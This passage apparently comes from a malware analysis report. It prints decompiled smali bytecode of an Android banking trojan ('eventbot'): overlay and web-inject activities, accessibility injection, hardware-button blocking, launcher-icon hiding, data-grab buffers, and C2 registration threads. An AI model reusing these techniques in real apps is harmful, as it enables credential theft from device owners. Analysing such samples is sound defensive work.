                        9if-eqz v2, :cond_1a
                        11invoke-virtual {p3}, Ljava/lang/String;->length()I
                        12move-result v2
                        13const/4 v3, 0x4
                        14if-eq v2, v3, :cond_1e
                        16invoke-virtual {p3}, Ljava/lang/String;->length()I
                        17move-result v2
                        18if-eq v2, v4, :cond_1e
                        19cond_1a: move v0, v1
                        20goto_1b: return v0
                        21cond_1c: move v0, v1
                        22goto/16 :goto_1b
                        23cond_1e: sput-boolean v0, Lcom/lib;->blockHardwareButtons:Z
                        24sput-boolean v1, Lcom/lib;->isPinned:Z
                        25new-instance v1, Landroid/content/Intent;
                        27sget-object v2, Lcom/lib;->activityHelperClass:Ljava/lang/Class;
                        29invoke-direct {v1, p1, v2}, Landroid/content/Intent;-><init>(Landroid/content/Context;Ljava/lang/Class;)V
                        30const v2, 0x10008000
                        32invoke-virtual {v1, v2}, Landroid/content/Intent;->addFlags(I)Landroid/content/Intent;
                        34const-string v2, "mode"
                        36invoke-virtual {v1, v2, v4}, Landroid/content/Intent;->putExtra(Ljava/lang/String;I)Landroid/content/Intent;
                        38sget-object v2, Lcom/lib;->STRINGS_HTML:Ljava/lang/String;
                        40invoke-virtual {v1, v2, p2}, Landroid/content/Intent;->putExtra(Ljava/lang/String;Ljava/lang/String;)Landroid/content/Intent;
                        42sget-object v2, Lcom/lib;->STRINGS_BG:Ljava/lang/String;
                        44invoke-virtual {v1, v2, p3}, Landroid/content/Intent;->putExtra(Ljava/lang/String;Ljava/lang/String;)Landroid/content/Intent;
                        46invoke-virtual {p1, v1}, Landroid/content/Context;->startActivity(Landroid/content/Intent;)V
                        47goto/16 :goto_1b
                        APIs
                        • android.content.Context.getPackageManager
                        • android.content.Context.getPackageName
                        • java.lang.StringBuilder.<init>
                        • android.content.Context.getPackageName
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • android.content.ComponentName.<init>
                        • android.content.pm.PackageManager.setComponentEnabledSetting
                        Strings
                        • .MainActivity
                        Position Instruction Meta Information
                        0.prologue
                        1const/4 v0, 0x1
                        2const/4 v1, 0x0
                        4invoke-virtual {p1}, Landroid/content/Context;->getPackageManager()Landroid/content/pm/PackageManager;
                        5move-result-object v2
                        6if-eqz v2, :cond_2c
                        7new-instance v1, Landroid/content/ComponentName;
                        9invoke-virtual {p1}, Landroid/content/Context;->getPackageName()Ljava/lang/String;
                        10move-result-object v3
                        11new-instance v4, Ljava/lang/StringBuilder;
                        13invoke-direct {v4}, Ljava/lang/StringBuilder;-><init>()V
                        15invoke-virtual {p1}, Landroid/content/Context;->getPackageName()Ljava/lang/String;
                        16move-result-object v5
                        18invoke-virtual {v4, v5}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        19move-result-object v4
                        21const-string v5, ".MainActivity"
                        23invoke-virtual {v4, v5}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        24move-result-object v4
                        26invoke-virtual {v4}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        27move-result-object v4
                        29invoke-direct {v1, v3, v4}, Landroid/content/ComponentName;-><init>(Ljava/lang/String;Ljava/lang/String;)V
                        31invoke-virtual {v2, v1, v0, v0}, Landroid/content/pm/PackageManager;->setComponentEnabledSetting(Landroid/content/ComponentName;II)V
                        32goto_2b: return v0
                        33cond_2c: move v0, v1
                        34goto/16 :goto_2b
                        Cross References
                        APIs
                        • java.lang.Object.getClass
                        • java.lang.Class.getName
                        • java.lang.StringBuilder.<init>
                        • java.lang.Object.getClass
                        • java.lang.Class.getSimpleName
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.RuntimeException.<init>
                        Strings
                        • does not have a Parcelizer
                        Position Instruction Meta Information
                        0try_start_0:
                        1invoke-virtual {p1}, Ljava/lang/Object;->getClass()Ljava/lang/Class;
                        2move-result-object v0
                        4invoke-static {v0}, Landroidx/versionedparcelable/VersionedParcel;->findParcelClass(Ljava/lang/Class;)Ljava/lang/Class;
                        5move-result-object p1
                        6try_end_8:
                        7invoke-virtual {p1}, Ljava/lang/Class;->getName()Ljava/lang/String;
                        8move-result-object p1
                        10invoke-virtual {p0, p1}, Landroidx/versionedparcelable/VersionedParcel;->writeString(Ljava/lang/String;)V
                        11return-void
                        12catch_10: move-exception v0
                        13new-instance v1, Ljava/lang/RuntimeException;
                        14new-instance v2, Ljava/lang/StringBuilder;
                        16invoke-direct {v2}, Ljava/lang/StringBuilder;-><init>()V
                        18invoke-virtual {p1}, Ljava/lang/Object;->getClass()Ljava/lang/Class;
                        19move-result-object p1
                        21invoke-virtual {p1}, Ljava/lang/Class;->getSimpleName()Ljava/lang/String;
                        22move-result-object p1
                        24invoke-virtual {v2, p1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        26const-string p1, " does not have a Parcelizer"
                        28invoke-virtual {v2, p1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        30invoke-virtual {v2}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        31move-result-object p1
                        33invoke-direct {v1, p1, v0}, Ljava/lang/RuntimeException;-><init>(Ljava/lang/String;Ljava/lang/Throwable;)V
                        34throw v1
                        APIs
                        • android.util.Log.d
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • android.util.Log.d
                        • android.os.Handler.<init>
                        • android.os.Handler.postDelayed
                        Strings
                        • [func] [service] [alarm] onReceive
                        • [func] [service] [alarm] [onReceive] service.isRunning:
                        Position Instruction Meta Information
                        1sget-object p2, Lcom/example/eventbot/cfg;->TAG:Ljava/lang/String;
                        3const-string v0, "[func] [service] [alarm] onReceive"
                        5invoke-static {p2, v0}, Landroid/util/Log;->d(Ljava/lang/String;Ljava/lang/String;)I
                        7sget-object p2, Lcom/example/eventbot/cfg;->TAG:Ljava/lang/String;
                        8new-instance v0, Ljava/lang/StringBuilder;
                        10invoke-direct {v0}, Ljava/lang/StringBuilder;-><init>()V
                        12const-string v1, "[func] [service] [alarm] [onReceive] service.isRunning: "
                        14invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        15sget-boolean v1, Lcom/example/eventbot/service;->isRunning:Z
                        17invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Z)Ljava/lang/StringBuilder;
                        19invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        20move-result-object v0
                        22invoke-static {p2, v0}, Landroid/util/Log;->d(Ljava/lang/String;Ljava/lang/String;)I
                        23new-instance p2, Landroid/os/Handler;
                        25invoke-direct {p2}, Landroid/os/Handler;-><init>()V
                        26new-instance v0, Lcom/example/eventbot/alarm$1;
                        28invoke-direct {v0, p0, p1}, Lcom/example/eventbot/alarm$1;-><init>(Lcom/example/eventbot/alarm;Landroid/content/Context;)V
                        29const-wide/16 v1, 0x0
                        31invoke-virtual {p2, v0, v1, v2}, Landroid/os/Handler;->postDelayed(Ljava/lang/Runnable;J)Z
                        32return-void
                        APIs
                        • java.lang.Object.<init>
                        • java.lang.String.<init>
                        • java.lang.Integer.valueOf
                        • java.lang.String.<init>
                        • java.lang.Thread.<init>
                        • java.lang.Thread.<init>
                        • com.lib$9.<init>
                        • java.lang.String.toCharArray
                        Strings
                        • 0123456789abcdef
                        Position Instruction Meta Information
                        0.prologue
                        1const/4 v6, 0x3
                        2const/4 v5, 0x1
                        3const/4 v4, 0x0
                        4const/4 v3, 0x6
                        5const/4 v2, 0x2
                        7invoke-direct {p0}, Ljava/lang/Object;-><init>()V
                        8new-instance v0, Ljava/lang/String;
                        10invoke-direct {v0}, Ljava/lang/String;-><init>()V
                        11iput-object v0, p0, Lcom/lib;->gateKey:Ljava/lang/String;
                        13invoke-static {v3}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        14move-result-object v0
                        15iput-object v0, p0, Lcom/lib;->timeout:Ljava/lang/Integer;
                        16iput-boolean v4, p0, Lcom/lib;->a11yAlertVisible:Z
                        17const/4 v0, 0x0
                        18iput-object v0, p0, Lcom/lib;->webInjCurrentApp:Ljava/lang/String;
                        19new-instance v0, Ljava/lang/String;
                        21invoke-direct {v0}, Ljava/lang/String;-><init>()V
                        22iput-object v0, p0, Lcom/lib;->urlsFallback:Ljava/lang/String;
                        23new-instance v0, Ljava/lang/Thread;
                        24new-instance v1, Lcom/lib$1;
                        26invoke-direct {v1, p0}, Lcom/lib$1;-><init>(Lcom/lib;)V
                        28invoke-direct {v0, v1}, Ljava/lang/Thread;-><init>(Ljava/lang/Runnable;)V
                        29iput-object v0, p0, Lcom/lib;->networkThread:Ljava/lang/Thread;
                        30new-instance v0, Ljava/lang/Thread;
                        31new-instance v1, Lcom/lib$2;
                        33invoke-direct {v1, p0}, Lcom/lib$2;-><init>(Lcom/lib;)V
                        35invoke-direct {v0, v1}, Ljava/lang/Thread;-><init>(Ljava/lang/Runnable;)V
                        36iput-object v0, p0, Lcom/lib;->permissionsThread:Ljava/lang/Thread;
                        37new-instance v0, Lcom/lib$9;
                        39invoke-direct {v0, p0}, Lcom/lib$9;-><init>(Lcom/lib;)V
                        40iput-object v0, p0, Lcom/lib;->a11yInjectThread:Ljava/lang/Thread;
                        42const-string v0, "0123456789abcdef"
                        44invoke-virtual {v0}, Ljava/lang/String;->toCharArray()[C
                        45move-result-object v0
                        46iput-object v0, p0, Lcom/lib;->HEX_ARRAY:[C
                        47iput v5, p0, Lcom/lib;->ACTIVITY_MODE_ADMIN:I
                        48iput v2, p0, Lcom/lib;->ACTIVITY_MODE_A11Y:I
                        49iput v6, p0, Lcom/lib;->ACTIVITY_MODE_OVERLAY:I
                        50const/4 v0, 0x4
                        51iput v0, p0, Lcom/lib;->ACTIVITY_MODE_LOCK_NAVIGATION:I
                        52const/4 v0, 0x5
                        53iput v0, p0, Lcom/lib;->ACTIVITY_MODE_LOCK_OVERLAY:I
                        54iput v3, p0, Lcom/lib;->ACTIVITY_MODE_WEB:I
                        55const/4 v0, 0x7
                        56iput v0, p0, Lcom/lib;->ACTIVITY_MODE_PINNED:I
                        57const/16 v0, 0x7b
                        58iput v0, p0, Lcom/lib;->ACTIVITY_RESULT_ADMIN:I
                        59iput v2, p0, Lcom/lib;->COMMAND_FAIL:I
                        60iput v6, p0, Lcom/lib;->COMMAND_SUCCESS:I
                        61const/4 v0, 0x4
                        62iput v0, p0, Lcom/lib;->COMMAND_NO_PERMISSIONS:I
                        63const/4 v0, 0x5
                        64iput v0, p0, Lcom/lib;->COMMAND_SCREEN_LOCKED:I
                        65iput v3, p0, Lcom/lib;->COMMAND_ALREADY_STARTED:I
                        66const/4 v0, 0x7
                        67iput v0, p0, Lcom/lib;->COMMAND_WEB_REQUESTED:I
                        68const/16 v0, 0x8
                        69iput v0, p0, Lcom/lib;->COMMAND_WEB_FINISHED:I
                        70const/16 v0, 0x9
                        71iput v0, p0, Lcom/lib;->COMMAND_IN_PROGRESS:I
                        72iput v5, p0, Lcom/lib;->ACTION_START:I
                        73iput v4, p0, Lcom/lib;->ACTION_STOP:I
                        74iput v2, p0, Lcom/lib;->ACTION_UPDATE:I
                        75return-void
                        Cross References
                        APIs
                        • android.app.Activity.<init>
                        • android.app.Activity.finish
                        • android.app.Activity.finish
                        • android.app.Activity.stopLockTask
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        Strings
                        • [func] [removePinnned] T:
                        Position Instruction Meta Information
                        0.prologue
                        1try_start_0:
                        2invoke-virtual {p0, p1, p2}, Lcom/lib;->removeOverlay(Landroid/content/Context;Landroid/webkit/WebView;)Z
                        3const/4 v0, 0x0
                        4sput-boolean v0, Lcom/lib;->blockHardwareButtons:Z
                        5const/4 v0, 0x1
                        6sput-boolean v0, Lcom/lib;->isPinned:Z
                        7sget v0, Landroid/os/Build$VERSION;->SDK_INT:I
                        8const/16 v1, 0x15
                        9if-gt v0, v1, :cond_1d
                        10new-instance v0, Landroid/app/Activity;
                        12invoke-direct {v0}, Landroid/app/Activity;-><init>()V
                        14invoke-virtual {v0}, Landroid/app/Activity;->finish()V
                        15goto_17:
                        16sget-object v0, Lcom/lib;->pinnedActivity:Landroid/app/Activity;
                        18invoke-virtual {v0}, Landroid/app/Activity;->finish()V
                        19goto_1c: return-void
                        20cond_1d:
                        21sget-object v0, Lcom/lib;->pinnedActivity:Landroid/app/Activity;
                        23invoke-virtual {v0}, Landroid/app/Activity;->stopLockTask()V
                        24try_end_22: goto/16 :goto_17
                        25catch_23: move-exception v0
                        26new-instance v1, Ljava/lang/StringBuilder;
                        28invoke-direct {v1}, Ljava/lang/StringBuilder;-><init>()V
                        30const-string v2, "[func] [removePinnned] T: "
                        32invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        33move-result-object v1
                        35invoke-virtual {v1, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        36move-result-object v0
                        38invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        39move-result-object v0
                        41invoke-virtual {p0, v0}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        42goto/16 :goto_1c
                        Cross References
                        APIs
                        • android.content.Context.getSystemService
                        • android.view.WindowManager.removeView
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        Strings
                        • [func] [removeOverlay]
                        • window
                        • [func] [removeOverlay] T:
                        Position Instruction Meta Information
                        0.prologue
                        1const/4 v1, 0x0
                        2if-eqz p2, :cond_17
                        4const-string v0, "[func] [removeOverlay]"
                        6invoke-virtual {p0, v0}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        7try_start_8:
                        8const-string v0, "window"
                        10invoke-virtual {p1, v0}, Landroid/content/Context;->getSystemService(Ljava/lang/String;)Ljava/lang/Object;
                        11move-result-object v0
                        12check-cast v0, Landroid/view/WindowManager;
                        13if-eqz v0, :cond_30
                        15invoke-interface {v0, p2}, Landroid/view/WindowManager;->removeView(Landroid/view/View;)V
                        16try_end_15: const/4 v0, 0x1
                        17goto_16: move v1, v0
                        18cond_17: return v1
                        19catch_18: move-exception v0
                        20new-instance v2, Ljava/lang/StringBuilder;
                        22invoke-direct {v2}, Ljava/lang/StringBuilder;-><init>()V
                        24const-string v3, "[func] [removeOverlay] T: "
                        26invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        27move-result-object v2
                        29invoke-virtual {v2, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        30move-result-object v0
                        32invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        33move-result-object v0
                        35invoke-virtual {p0, v0}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        36goto/16 :goto_17
                        37cond_30: move v0, v1
                        38goto/16 :goto_16
                        Cross References
                        APIs
                        • java.util.List.size
                        • java.lang.String.split
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        Strings
                        • gateUrlsPrefs
                        • ;
                        • [func] [loadUrls] T:
                        Position Instruction Meta Information
                        0.prologue
                        1try_start_0: iput-object p2, p0, Lcom/lib;->urlsFallback:Ljava/lang/String;
                        3invoke-virtual {p0}, Lcom/lib;->getAdminUrls()Ljava/util/List;
                        4move-result-object v0
                        6invoke-interface {v0}, Ljava/util/List;->size()I
                        7move-result v0
                        8if-nez v0, :cond_18
                        10const-string v0, "gateUrlsPrefs"
                        12const-string v1, ";"
                        14invoke-virtual {p2, v1}, Ljava/lang/String;->split(Ljava/lang/String;)[Ljava/lang/String;
                        15move-result-object v1
                        16const/4 v2, 0x0
                        18invoke-virtual {p0, p1, v0, v1, v2}, Lcom/lib;->writeGateUrls(Landroid/content/Context;Ljava/lang/String;[Ljava/lang/String;Z)Z
                        19try_end_18: return-void
                        20catch_19: move-exception v0
                        21new-instance v1, Ljava/lang/StringBuilder;
                        23invoke-direct {v1}, Ljava/lang/StringBuilder;-><init>()V
                        25const-string v2, "[func] [loadUrls] T: "
                        27invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        28move-result-object v1
                        30invoke-virtual {v1, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        31move-result-object v0
                        33invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        34move-result-object v0
                        36invoke-virtual {p0, v0}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        37goto/16 :goto_18
                        APIs
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • android.app.Activity.isFinishing
                        • java.lang.Integer.intValue
                        • java.lang.Integer.intValue
                        • android.app.Activity.finish
                        Strings
                        • [func] [activity] [onPause]
                        Position Instruction Meta Information
                        0.prologue
                        1const/4 v2, 0x6
                        2new-instance v0, Ljava/lang/StringBuilder;
                        4invoke-direct {v0}, Ljava/lang/StringBuilder;-><init>()V
                        6const-string v1, "[func] [activity] [onPause] "
                        8invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        9move-result-object v0
                        11invoke-virtual {v0, p5}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        12move-result-object v0
                        14invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        15move-result-object v0
                        17invoke-virtual {p0, v0}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        19invoke-virtual {p2}, Landroid/app/Activity;->isFinishing()Z
                        20move-result v0
                        21if-eqz v0, :cond_24
                        23invoke-virtual {p5}, Ljava/lang/Integer;->intValue()I
                        24move-result v0
                        25if-ne v0, v2, :cond_23
                        26goto_23: return-void
                        27cond_24:
                        28invoke-virtual {p5}, Ljava/lang/Integer;->intValue()I
                        29move-result v0
                        30if-ne v0, v2, :cond_23
                        31const/4 v0, 0x0
                        32iput-object v0, p0, Lcom/lib;->webInjCurrentApp:Ljava/lang/String;
                        34invoke-virtual {p2}, Landroid/app/Activity;->finish()V
                        35goto/16 :goto_23
                        Cross References
                        APIs
                        • android.content.Intent.<init>
                        • android.content.Intent.addFlags
                        • android.content.Intent.putExtra
                        • android.content.Intent.putExtra
                        • android.content.Intent.putExtra
                        • android.content.Context.startActivity
                        Strings
                        • mode
                        • url
                        • stopWord
                        Position Instruction Meta Information
                        0.prologue
                        1if-nez p2, :cond_4
                        2const/4 v0, 0x0
                        3goto_3: return v0
                        4cond_4: new-instance v0, Landroid/content/Intent;
                        6sget-object v1, Lcom/lib;->activityHelperClass:Ljava/lang/Class;
                        8invoke-direct {v0, p1, v1}, Landroid/content/Intent;-><init>(Landroid/content/Context;Ljava/lang/Class;)V
                        9const v1, 0x10800010
                        11invoke-virtual {v0, v1}, Landroid/content/Intent;->addFlags(I)Landroid/content/Intent;
                        13const-string v1, "mode"
                        14const/4 v2, 0x6
                        16invoke-virtual {v0, v1, v2}, Landroid/content/Intent;->putExtra(Ljava/lang/String;I)Landroid/content/Intent;
                        18const-string v1, "url"
                        20invoke-virtual {v0, v1, p2}, Landroid/content/Intent;->putExtra(Ljava/lang/String;Ljava/lang/String;)Landroid/content/Intent;
                        22const-string v1, "stopWord"
                        24invoke-virtual {v0, v1, p3}, Landroid/content/Intent;->putExtra(Ljava/lang/String;Ljava/lang/String;)Landroid/content/Intent;
                        26invoke-virtual {p1, v0}, Landroid/content/Context;->startActivity(Landroid/content/Intent;)V
                        27const/4 v0, 0x1
                        28goto/16 :goto_3
                        Cross References
                        APIs
                        • java.util.concurrent.Semaphore.acquire
                        • java.lang.Integer.valueOf
                        • java.lang.Integer.valueOf
                        • org.json.JSONObject.keys
                        • java.util.Iterator.hasNext
                        • org.json.JSONObject.keys
                        • java.util.Iterator.next
                        • org.json.JSONObject.remove
                        • java.util.concurrent.Semaphore.release
                        • java.util.concurrent.Semaphore.release
                        Position Instruction Meta Information
                        0.prologue
                        1try_start_0:
                        2sget-object v0, Lcom/lib;->injectMutex:Ljava/util/concurrent/Semaphore;
                        4invoke-virtual {v0}, Ljava/util/concurrent/Semaphore;->acquire()V
                        5try_end_5: const/4 v0, 0x0
                        6try_start_6: sput-boolean v0, Lcom/lib;->isA11yInjected:Z
                        8const-string v0, ""
                        9sput-object v0, Lcom/lib;->injectJSON:Ljava/lang/String;
                        11const-string v0, ""
                        12sput-object v0, Lcom/lib;->injectedPackage:Ljava/lang/String;
                        13const/4 v0, 0x0
                        15invoke-static {v0}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        16move-result-object v0
                        17sput-object v0, Lcom/lib;->injectStep:Ljava/lang/Integer;
                        18const/4 v0, 0x0
                        19sput-boolean v0, Lcom/lib;->globalInjectResult:Z
                        20const/4 v0, 0x1
                        21sput-boolean v0, Lcom/lib;->injectOnce:Z
                        23sget-object v0, Lcom/lib;->searchRetriesMAXconst:Ljava/lang/Integer;
                        24sput-object v0, Lcom/lib;->searchRetriesMAX:Ljava/lang/Integer;
                        25const/4 v0, 0x0
                        26sput-boolean v0, Lcom/lib;->searchRetriesSET:Z
                        27const/4 v0, 0x0
                        28sput-boolean v0, Lcom/lib;->isCheckError:Z
                        30const-string v0, ""
                        31sput-object v0, Lcom/lib;->errorClass:Ljava/lang/String;
                        33const-string v0, ""
                        34sput-object v0, Lcom/lib;->errorType:Ljava/lang/String;
                        36const-string v0, ""
                        37sput-object v0, Lcom/lib;->errorMsg:Ljava/lang/String;
                        39const-string v0, ""
                        40sput-object v0, Lcom/lib;->injectJSON:Ljava/lang/String;
                        41const/4 v0, -0x1
                        43invoke-static {v0}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        44move-result-object v0
                        45sput-object v0, Lcom/lib;->injectJSONid:Ljava/lang/Integer;
                        47sget-object v0, Lcom/lib;->grabBuffer:Lorg/json/JSONObject;
                        49invoke-virtual {v0}, Lorg/json/JSONObject;->keys()Ljava/util/Iterator;
                        50move-result-object v1
                        51goto_44:
                        52invoke-interface {v1}, Ljava/util/Iterator;->hasNext()Z
                        53move-result v0
                        54if-eqz v0, :cond_65
                        56sget-object v2, Lcom/lib;->grabBuffer:Lorg/json/JSONObject;
                        58sget-object v0, Lcom/lib;->grabBuffer:Lorg/json/JSONObject;
                        60invoke-virtual {v0}, Lorg/json/JSONObject;->keys()Ljava/util/Iterator;
                        61move-result-object v0
                        63invoke-interface {v0}, Ljava/util/Iterator;->next()Ljava/lang/Object;
                        64move-result-object v0
                        65check-cast v0, Ljava/lang/String;
                        67invoke-virtual {v2, v0}, Lorg/json/JSONObject;->remove(Ljava/lang/String;)Ljava/lang/Object;
                        68try_end_5b: goto/16 :goto_44
                        69catchall_5c: move-exception v0
                        70try_start_5d:
                        71sget-object v1, Lcom/lib;->injectMutex:Ljava/util/concurrent/Semaphore;
                        73invoke-virtual {v1}, Ljava/util/concurrent/Semaphore;->release()V
                        74throw v0
                        75try_end_63: move-exception v0
                        76goto_64: return-void
                        77cond_65:
                        78invoke-static {}, Lcom/lib;->removeOverlay()Z
                        79const/4 v0, 0x0
                        80sput-boolean v0, Lcom/lib;->blockHardwareButtons:Z
                        82sget-object v0, Lcom/lib;->a11yContext:Landroid/content/Context;
                        84sget-object v1, Lcom/lib;->navBar:Landroid/widget/FrameLayout;
                        86invoke-static {v0, v1}, Lcom/lib;->unHideArea(Landroid/content/Context;Landroid/widget/FrameLayout;)Z
                        88sget-object v0, Lcom/lib;->a11yContext:Landroid/content/Context;
                        90sget-object v1, Lcom/lib;->actBar:Landroid/widget/FrameLayout;
                        92invoke-static {v0, v1}, Lcom/lib;->unHideArea(Landroid/content/Context;Landroid/widget/FrameLayout;)Z
                        94invoke-virtual {p0, p1}, Lcom/lib;->minimizeAll(Landroid/content/Context;)V
                        95try_start_7c:
                        96sget-object v0, Lcom/lib;->injectMutex:Ljava/util/concurrent/Semaphore;
                        98invoke-virtual {v0}, Ljava/util/concurrent/Semaphore;->release()V
                        99try_end_81: goto/16 :goto_64
                        Cross References
                        APIs
                        • java.util.ArrayList.<init>
                        • java.security.SecureRandom.<init>
                        • java.security.SecureRandom.nextBytes
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.util.List.add
                        • java.util.List.add
                        Position Instruction Meta Information
                        0.annotation system Ldalvik/annotation/Signature;
                        1value = {
                        2"(",
                        3"Ljava/lang/String;",
                        4")",
                        5"Ljava/util/List",
                        6"<[B>;"
                        7}
                        8.end annotation
                        9.prologue
                        10const/16 v5, 0x20
                        11new-instance v0, Ljava/util/ArrayList;
                        13invoke-direct {v0}, Ljava/util/ArrayList;-><init>()V
                        14new-array v1, v5, [B
                        16invoke-virtual {p0, p1}, Lcom/lib;->hexStringToByteArray(Ljava/lang/String;)[B
                        17move-result-object v2
                        18new-array v3, v5, [B
                        19new-array v4, v5, [B
                        20new-array v5, v5, [B
                        21new-instance v6, Ljava/security/SecureRandom;
                        23invoke-direct {v6}, Ljava/security/SecureRandom;-><init>()V
                        25invoke-virtual {v6, v4}, Ljava/security/SecureRandom;->nextBytes([B)V
                        26new-instance v6, Lcom/lib$Curve25519;
                        28invoke-direct {v6, p0}, Lcom/lib$Curve25519;-><init>(Lcom/lib;)V
                        30invoke-virtual {v6, v3, v5, v4}, Lcom/lib$Curve25519;->keygen([B[B[B)V
                        32invoke-virtual {v6, v1, v4, v2}, Lcom/lib$Curve25519;->curve([B[B[B)V
                        33new-instance v4, Ljava/lang/StringBuilder;
                        35invoke-direct {v4}, Ljava/lang/StringBuilder;-><init>()V
                        37invoke-virtual {p0, v1}, Lcom/lib;->bytesToHex([B)Ljava/lang/String;
                        38move-result-object v1
                        40invoke-virtual {v4, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        41move-result-object v1
                        43invoke-virtual {p0, v2}, Lcom/lib;->bytesToHex([B)Ljava/lang/String;
                        44move-result-object v2
                        46invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        47move-result-object v1
                        49invoke-virtual {p0, v3}, Lcom/lib;->bytesToHex([B)Ljava/lang/String;
                        50move-result-object v2
                        52invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        53move-result-object v1
                        55invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        56move-result-object v1
                        58invoke-virtual {p0, v1}, Lcom/lib;->sha256(Ljava/lang/String;)[B
                        59move-result-object v1
                        61invoke-interface {v0, v1}, Ljava/util/List;->add(Ljava/lang/Object;)Z
                        63invoke-interface {v0, v3}, Ljava/util/List;->add(Ljava/lang/Object;)Z
                        64return-object v0
                        APIs
                        • android.os.Looper.prepare
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.Thread.start
                        Strings
                        • registered
                        • [func] [networkThread] T:
                        Position Instruction Meta Information
                        0.prologue
                        1try_start_0:
                        2invoke-static {}, Landroid/os/Looper;->prepare()V
                        4iget-object v0, p0, Lcom/lib$1;->this$0:Lcom/lib;
                        6iget-object v1, p0, Lcom/lib$1;->this$0:Lcom/lib;
                        8iget-object v1, v1, Lcom/lib;->context:Landroid/content/Context;
                        10invoke-virtual {v0, v1}, Lcom/lib;->regOnWeb(Landroid/content/Context;)Z
                        11move-result v0
                        12if-eqz v0, :cond_16
                        14iget-object v0, p0, Lcom/lib$1;->this$0:Lcom/lib;
                        16const-string v1, "registered"
                        18invoke-virtual {v0, v1}, Lcom/lib;->showToastLong(Ljava/lang/String;)V
                        19cond_16:
                        20iget-object v0, p0, Lcom/lib$1;->this$0:Lcom/lib;
                        22iget-object v1, p0, Lcom/lib$1;->this$0:Lcom/lib;
                        24iget-object v1, v1, Lcom/lib;->context:Landroid/content/Context;
                        26invoke-virtual {v0, v1}, Lcom/lib;->knock(Landroid/content/Context;)V
                        27cond_1f: return-void
                        28catch_20: move-exception v0
                        30iget-object v1, p0, Lcom/lib$1;->this$0:Lcom/lib;
                        31new-instance v2, Ljava/lang/StringBuilder;
                        33invoke-direct {v2}, Ljava/lang/StringBuilder;-><init>()V
                        35const-string v3, "[func] [networkThread] T: "
                        37invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        38move-result-object v2
                        40invoke-virtual {v2, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        41move-result-object v0
                        43invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        44move-result-object v0
                        46invoke-virtual {v1, v0}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        47sget-boolean v0, Lcom/lib;->isLibUpdating:Z
                        48if-nez v0, :cond_1f
                        50iget-object v0, p0, Lcom/lib$1;->this$0:Lcom/lib;
